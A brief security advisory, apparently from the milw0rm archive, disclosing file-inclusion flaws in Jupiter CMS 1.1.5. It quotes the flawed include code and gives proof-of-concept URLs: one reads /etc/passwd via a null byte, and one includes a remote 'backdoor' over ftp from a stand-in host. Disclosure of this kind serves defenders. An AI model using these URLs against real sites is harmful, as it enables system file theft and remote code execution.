Title: Jupiter CMS 1.1.5 Multiple Vulnerabilities
Advisory ID: 12070214
Risk level: High
Author: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/advisories/12070214.txt
Risk level: High
Summary: Local/Remote File Inclusion
Conditions: LFI: magic_quotes_gpc = Off
RFI: PHP >= 5.0.0, allow_url_fopen = On
The script "index.php" contains the following code:
if(strpos($n, "../") !== false) header("location: $PHP_SELF?i=error");
else include("$n.php");
elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error");
The "n" parameter isn't properly filtered, this can lead to file inclusion.
Local file inclusion will work if magic_quotes_gpc=Off, the null byte char \x00
is required. Remote file inclusion will work if the server is running on PHP >= 5.
In this version, the file_exists() function can be used with some URL wrappers,
you can use ftp:// for example. Simple poc:
LFI: http://<host><path>/index.php?n=/etc/passwd%00
RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor
# milw0rm.com [2007-02-14]